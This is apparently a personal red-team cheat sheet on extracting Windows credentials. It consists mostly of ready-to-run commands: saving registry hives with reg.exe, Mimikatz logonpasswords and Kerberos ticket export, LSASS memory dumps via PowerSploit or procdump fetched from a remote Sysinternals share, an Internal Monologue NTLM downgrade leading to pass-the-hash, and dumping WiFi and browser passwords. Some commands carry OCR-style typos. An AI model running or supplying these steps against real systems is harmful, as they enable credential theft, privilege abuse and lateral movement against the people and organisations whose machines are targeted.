Windows Local Password Hashes

## CREDDUMP https://github.com/Neohapsis/creddump7 Use 'creddump' on the SYSTEM and SECURITY hives to extract any possible cached domain credentials. Three modes of attack: cachedump, lsadump, pwdump Manually save Windows XP/Vista/7 registry hive tables using 'reg.exe': ``` C:\WINDOWS\system32>reg.exe save HKLM\SAM sam_backup.hiv C:\WINDOWS\system32>reg.exe save HKLM\SECURITY sec_backup.hiv C:\WINDOWS\system32>reg.exe save HKLM\system sys_backup.hiv ``` ## CACHEDUMP: Run creddump tool against the saved hive files ``` cachedump.py <system hive> <security hive> <Vista/7=true/XP=false>: (Vista/7) cachedump.py sys_backup.hiv sec_backup.hiv true (XP) cachedump.py sys_backup.hiv sec_backup.hiv false ``` ## LSADUMP: Run lsadump tool against the saved hive files ``` cachedump.py <system hive> <security hive> <Vista/7=true/XP=false>: (Vista/7) lsadump.py sys_backup.hiv sec_backup.hiv true (XP) lsadump.py sys_backup.hiv sec_backup.hiv false ``` ## PWDUMP: Run pwdump tool against the saved hive files ``` cachedump.py <system hive> <sam hive> <Vista/7=true/XP=false>: (Vista/7) pwdump.py sys_backup.hiv sam_backup.hiv true (XP) pwdump.py sys_backup.hiv sam_backup.hiv false ``` ## METERPRETER Post exploitation dump local SAM database: ``` meterpreter> run post/windows/gather/hashdump ``` ## [[MIMIKATZ]] https://github.com/gentilkiwi/mimikatz https://github.com/gentilkiwi/mimikatz/wiki Post exploitation commands must be executed from admin or SYSTEM level privileges. Command structure modulename::commandname arguments STEP 1: Start logging output of mimikatz. Defaults to Mimikatz.log ``` mimikatz # log ``` STEP 2: Enable debug privileges for processes ``` mimikatz # privilege::debug ``` STEP 3: Dump in-memory logon passwords ``` mimikatz # sekurlsa::logonpasswords full ``` STEP 4: Dump any Kerberos tickets stored ``` mimikatz # sekurlsa::tickets /export ``` You can evelate priviliges in order to perform certain modules ``` mimikatz # token::whoami mimikatz # token::elevate ``` ## OFFLINE MIMIKATZ ATTACKS ## WINDOWS LSASS MEMORY DUMP You can memory dump the LSASS process using Out-Minidump.psl from PowerSploit and extract the plaintext passwords offline with Mimikatz. https://github.com/PowerShellMafia/PowerSploit https://astr0baby.wordpress.com/2019/01/21/andrewspecial-stealthy-lsass-exememory-dumping/ STEP 1: Copy PowerSploit into the user module path ``` "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" on target: PS C:\>lmport-Module PowerSploit ``` STEP 2: Dump the LSASS process memory with Out-Minidump in PowerSploit: ``` PS C:\>Get-Process lsass I Out-Minidump ``` STEP 3: Copy the output memory dump file (Example lsass_385.dmp) to your attack workstation and run mimikatz against minidump dump file: ``` ./mimikatz "sekurlsa::minidump lsass_385.dmp" ``` STEP 4: Now in MINIDUMP extract the plaintext passwords: ``` mimikatz # sekurlsa::logonpasswords ``` ## WINDOWS REGISTRY HASH EXTRACTION Save Windows SYSTEM, SAM, SECURITY registry hives in order to extract passwords. Save Windows XP/Vista/7 registry tables ``` C:\WINDOWS\system32>reg.exe save HKLM\SAM C:\temp\sam_backup.hiv C:\WINDOWS\system32>reg.exe save HKLM\SECURITY C:\temp\sec_backup.hiv C:\WINDOWS\system32>reg.exe save HKLM\system C:\temp\sys_backup.hiv ``` STEP 1: Save registry hive using the above reg.exe into C:\temp STEP 2: Copy saved registry hive files to local attack workstation. STEP 3: Execute mimikatz against SYSTEM and SAM hive to extract passwords: ``` mimikatz # lsadump::sam sys_backup.hiv sam_backup.hiv ``` ## MIMIKATZ DPAPI You can abuse the Windows DPAPI functionality to encrypt and decrypt data such as browser locally stored cookies/logins, credential managers, and .rdg RDP files. This technique is very complex. I encourage you to read the below references to have a better understanding of this attack vector. REFERENCES: https://github.com/gentilkiwi/mimikatz/wiki/module---dpapi https://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-userdpapi-abuse/ https://www.synacktiv.com/ressources/univershell_2017_dpapi.pdf https://github.com/dfirfpi/dpapilab https://bitbucket.org/jmichel/dpapick ## INTERNAL MONOLOGUE LOCAL ATTACK NTLMv1/NTLMv2 On targets where Mimikatz is not suitable to use due to AV or EDR solutions, you can perform an Internal Monologue Attack. This attack invokes a local procedure call to the NTLM authentication package (MSV1_0) from a user-mode application through SSPI to calculate a NetNTLM response in the context of the logged on user, after performing an extended NetNTLM downgrade to an NetNTLMvl hash. https://github.com/eladshamir/Internal-Monologue https://crack.sh/netntlm/ The Internal Monologue Attack flow is described below: 1-Disable NetNTLMvl preventive controls by changing LMCompatibilityLevel, NTLMMinClientSec and RestrictSendingNTLMTraffic to appropriate values, as described above. 2-Retrieve all non-network logon tokens from currently running processes and impersonate the associated users. 3-For each impersonated user, interact with NTLM SSP locally to elicit a NetNTLMvl response to the chosen challenge in the security context of the impersonated user. 4-Restore the original values of LMCompatibilityLevel, NTLMMinClientSec and RestrictSendingNTLMTraffic. 5-Crack the NTLM hash of the captured response. 6-Pass the Hash. STEP 1: Build/Compile the DLL or EXE for InternalMonologue. STEP 2: On target execute DLL/EXE with the follow options: ``` InternalMonologue -Downgrade True -Restore True -Impersonate True ``` AVAILABLE OPTIONS ``` Downgrade = specifies NTLMvl downgrade change !Registry Modification! Restore = restore original registry mods if downgraded Impersonate = impersonate ALL available users Verbose = print verbose output Challenge = optional custom 8-byte NTLM challenge. Default=11223344S5667788 ``` ## REMOTELY MOUNT SYSINTERNALS DUMP LSASS SCENARIO: You have gained admin access to a target system but do not want to put the sysinternals tools on disk. You can map the live hosted version of sysinternals and dump lsass process to extract hashes offline with mimikatz. !!Caveat: Port 445 outbound must be allowed out of the network to the internet. STEP 1: On target execute 'net use' to map the live version of sysinternals: ``` net use Z: \\live.sysinternals.com\tools\ "/user:" ``` STEP 2: Use 'procdump' to dump memory for the lsass process: ``` Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp ``` STEP 3: Copy the output memory dump file to your attack workstation and run mimikatz minidump against dump file: ``` mimikatz # sekurlsa::minidump lsass.dmp ``` STEP 4: Now in MINIDUMP extract the plaintext passwords: ``` mimikatz # sekurlsa::logonpasswords ``` ## DUMP STORED CLEARTEXT WIFI PASSWORD https://github.com/jcwalker/WiFiProfileManagement STEP 1: Git clone WiFiProfileManagement STEP 2: Drop the root folder in your PSModulePath, remove the branch name (ex. dev )from the folder, and PowerShell should find the module. STEP 3: Use 'Get-WiFiProfile' to dump the clear text password: ``` PS C:\>Get-WiFiProfile -ProfileName TestWiFi -ClearKey ``` ## SHARPWEB DUMP BROWSER CREDENTIALS https://github.com/djhohnstein/SharpWeb Usage: ``` .\SharpWeb.exe arg0 [argl arg2 ... ] Arguments: all full chrome firefox edge - Retrieve all Chrome, FireFox and IE/Edge credentials. The same as 'all' - Fetch saved Chrome logins. - Fetch saved FireFox logins. Fetch saved Internet Explorer/Microsoft Edge logins. SharpWeb.exe chrome firefox ``` ## POPULAR WINDOWS APPLICATIONS PASSWORD LOCATIONS SecurityXploded online resource for Windows applications password storage. https://securityxploded.com/passwordsecrets.php Internet Browsers Avant Comodo Dragon CoolNovo Firefox Flock Google Chrome Google Chrome Canary Internet Explorer Maxthon Opera Safari SeaMonkey FTP Clients Dreamweaver FileZilla FlashFXP FTPCommander SmartFTP WS_FTP Instant Messengers AIM (AOL IM) Beyluxe Messenger BigAnt Messenger Camfrog Video Messenger Digsby IM Google Talk (GTalk) IMVU Messenger Meebo Notifier Miranda MSN Messneger MySpaceIM Nimbuzz Messenger PaltalkScene Pidgin (Formerly Gaim) Skype Tencent QQ Trillian Windows Live Messenger XFire Yahoo Messenger 27 Email Clients Foxmail Gmail Notifier IncrediMail Microsoft Outlook ThunderBird Windows Live Mail Misc Applications Google Desktop Search Heroes of Newerth InternetDownload Manager JDownloader Orbit Downloader Picasa RemoteDesktop Seesmic SuperPutty TweetDec [[Home]] #howto